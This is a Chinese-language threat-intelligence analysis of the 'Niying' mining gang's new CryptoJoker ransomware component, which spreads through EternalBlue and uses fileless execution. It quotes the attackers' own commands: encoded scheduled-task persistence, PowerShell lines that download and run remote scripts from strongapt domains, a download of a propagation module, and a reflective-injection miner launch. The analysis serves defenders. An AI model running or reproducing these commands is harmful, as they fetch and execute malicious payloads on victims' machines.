“匿影”挖矿团伙新增勒索组件CryptoJoker，其横向扩散能力存重创企业网络风险

一、概述

腾讯安全威胁情报中心发现“匿影”挖矿团伙的攻击活动升级，该团伙新增加密勒索组件CryptoJoker，已从之前的挖矿计算转向勒索攻击非法牟利。匿影组织传播的勒索病毒组件在执行过程中采用无文件攻击技术，攻击过程中全程无样本文件落地，且在加密数据完成之后会清理定时任务，令事件溯源十分困难。

匿影组织于2019年3月开始出现，之后多次更新挖矿组件并持续使用永恒之蓝工具扩散传播。因该团伙通过多个功能网盘和图床隐藏自身，故安全研究人员将该家族命名为“匿影”。随着数字加密货币价格的上涨，该组织积极制作传播挖矿木马，同时挖取多种数字加密货币（PASC币、门罗币等）进行非法牟利活动，其挖矿活动对受害企业造成严重生产力损失。

腾讯安全专家在对本次新增的勒索病毒组件分析过程中，发现该组织多次使用拼音首字母缩写，且警告信存在明显语法问题，因此推测该团伙为国内黑产组织。匿影组织本次攻击活动的执行流程如下：

匿影最新变种攻击流程

二、详细分析

起始模块

“匿影”最新变种依然沿用NSA武器库中的永恒之蓝漏洞工具对目标发起攻击，攻陷目标后在失陷主机上启动X86/X64.dll的感染流程。首先检测该目标是否已经感染本组织的挖矿木马，如果已感染该团伙的挖矿木马，则不再继续感染勒索。

*powershell脚本解码后：

schtasks /create /ru system /sc MINUTE /mo 20 /tn CSware /tr “powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC*4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBzAHQAcgBvAG4AZwBhAHAAdAAuAGcAYQAvAHYAaQBwADIALgB0AHgAdAAnACkAKQA=”

载荷功能

首先创建名为CSware的计划任务,运行周期为二十分钟运行一次，运行脚本如下：

IEX ((new-object net.webclient).downloadstring(‘http://strongapt.ga/vip2.txt’))

更换了新域名的同时，沿用了该家族的文件命名习惯(vip*.txt)，该文件内容如下：

schtasks /create /ru system /sc MINUTE /mo 10 /tn PCHunterDNSml /tr “powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC*4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AG0AaQAuAHMAdAByAG8AbgBnAGEAcAB0AC*4AbQBsACcAKQApAA==”

不断跟进，经过多层嵌套解码之后触达两个核心功能模块：勒索功能模块与横向移动模块。

横向移动

启动漏扫进程smbzlib，下载永恒之蓝传播模块yhpc.exe（自解压程序）。横向移动沿用永恒之蓝漏洞利用工具包，只是战术性的更换了文件命名加以区分。

$fileNames = Test-Path C:\Users\Public\pc\smbzlib.exe$nic=’True’if($fileNames -eq $nic){Start-Process -FilePath C:\Users\Public\pc\smbzlib.exe }if($fileNames -ne $nic){(new-object System.Net.WebClient).DownloadFile( ‘https://yh.strongapt.ga’,’C:\ProgramData\yhpc.exe’)Start-Process -FilePath C:\ProgramData\yhpc.exe

勒索模块

勒索脚本分为两部分，第一部分声明反射性注入进程的开源powershell脚本，第二部分为勒索样本本身，并设置迷惑性挖矿参数。

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe “IEX (new-object net.webclient).downloadstring(‘http://api.strongapt.ml/powershell.jpg’);Invoke-ReflectivePEInjection -PEUrl http://api.strongapt.ml/555.jpg -ExeArgs ‘-o xmr.f2pool.com:13531 -u 4XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b.mmm -p x -k’ -ForceASLR” 勒索样本使用文件嵌套的形式执行加密勒索与清理功能，全程文件不落地。勒索文件本身是一个DLL文件，该DLL下载后直接注入powershell进程启动勒索进程，随后在进程中分配可执行空间拷贝内嵌EXE文件启动文件加密功能。

文件加密沿用经典的AES+RSA模式，加密文件后缀为.devos。勒索信中给出了被攻陷主机个人ID，并自称为CryptoJoker，勒索金额额度为0.1BTC.